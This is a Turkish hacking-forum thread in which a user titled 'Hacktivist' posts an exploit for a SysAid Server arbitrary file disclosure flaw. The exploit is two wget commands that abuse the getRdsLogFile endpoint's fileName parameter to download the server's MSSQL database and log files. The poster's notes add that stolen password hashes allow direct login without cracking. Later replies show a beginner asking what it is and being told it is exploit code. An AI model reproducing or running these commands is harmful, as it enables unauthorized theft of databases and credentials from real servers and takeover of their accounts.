Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: SysAid Server Arbitrary File Disclosure
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 55
Yaşam Puanı: 1,372 / 1,372
Deneyim: 91 / 100
Rep Sayısı: 2769
Mesaj Sayısı: 6325
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
SysAid Server Arbitrary File Disclosure
20.04.2015 21:08
Exploit =>
Kod:
wget -O "ilient.mdf" --header="Cookie:
JSESSIONID=1C712103AA8E9A3D3F1D834E0063A089" \
"http://sysaid.example.com/getRdsLogFile?fileName=c:\\\\Program+Files\\\\SysAidMsSQL\\\\MSSQL10_50.SYSAIDMS​SQL\\\\MSSQL\\DATA\\\\ilient.mdf"

wget -O "ilient.ldf" --header="Cookie:
JSESSIONID=1C712103AA8E9A3D3F1D834E0063A089" \
"http://sysaid.example.com/getRdsLogFile?fileName=c:\\\\Program+Files\\\\SysAidMsSQL\\\\MSSQL10_50.SYSAIDMS​SQL\\\\MSSQL\\DATA\\\\ilient_log.LDF"

Not => Saldırganlar için Sysaid Serverdaki siteler yetkili olmayan dosyalara direk okuma erişimi sağlıyor.Buraya giren kişi sitedeki kullanıcı hesaplarını değiştirebilir ve önemli sistem dosyalarını sadece okuyabilme ve indirebilme yetkisine sahip oluyorlar.

Not 2 => SysAid server veritabanı dosyalarınıa kullanıcı ve yönetici veya herhangi bir ID ile şifre hashını kullanarak direk girebilirsiniz. Hash kırmaya gerek yoktur.
(Bu konu en son: 20.04.2015 Tarihinde, Saat: 21:08 düzenlenmiştir. Düzenleyen: KingSkrupellos.)
Alinti
atakas
*
avatar
Yüzbaşı
Durum: Çevrimdışı
Seviye Puanı: 9
Yaşam Puanı: 17 / 216
Deneyim: 65 / 100
Rep Sayısı: 2
Mesaj Sayısı: 113
Üyelik Tarihi: 09.04.2015
     
Yorum: #2
Cvp: SysAid Server Arbitrary File Disclosure
21.04.2015 01:46
Bu Nedir Ustam
Alinti
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 55
Yaşam Puanı: 1,372 / 1,372
Deneyim: 91 / 100
Rep Sayısı:
Mesaj Sayısı: 6325
Üyelik Tarihi: 21.08.2013
     
Yorum: #3
RE: SysAid Server Arbitrary File Disclosure
21.04.2015 15:02
(21.04.2015 01:46)atakas Nickli Kullanıcıdan Alıntı:  Bu Nedir Ustam

Bu kod exploit kodlar. Yani Sysaid kurulu sitelerde yetkili olmadğın halde sitedeki dosyaları sanki yetkiliymişssin okumanı ve sistem üzerindeki dosyaları okumanı sağlar. Yeni başlıyorsun buna hiç dokunma derim.
Alinti
atakas
*
avatar
Yüzbaşı
Durum: Çevrimdışı
Seviye Puanı: 9
Yaşam Puanı: 17 / 216
Deneyim: 65 / 100
Rep Sayısı:
Mesaj Sayısı: 113
Üyelik Tarihi: 09.04.2015
     
Yorum: #4
RE: SysAid Server Arbitrary File Disclosure
21.04.2015 18:52
(21.04.2015 15:02)KingSkrupellos Nickli Kullanıcıdan Alıntı:  
(21.04.2015 01:46)atakas Nickli Kullanıcıdan Alıntı:  Bu Nedir Ustam

Bu kod exploit kodlar. Yani Sysaid kurulu sitelerde yetkili olmadğın halde sitedeki dosyaları sanki yetkiliymişssin okumanı ve sistem üzerindeki dosyaları okumanı sağlar. Yeni başlıyorsun buna hiç dokunma derim.
Yeni Başlıyorum ve dokunmayacam Exciting
Alinti



1 Ziyaretçi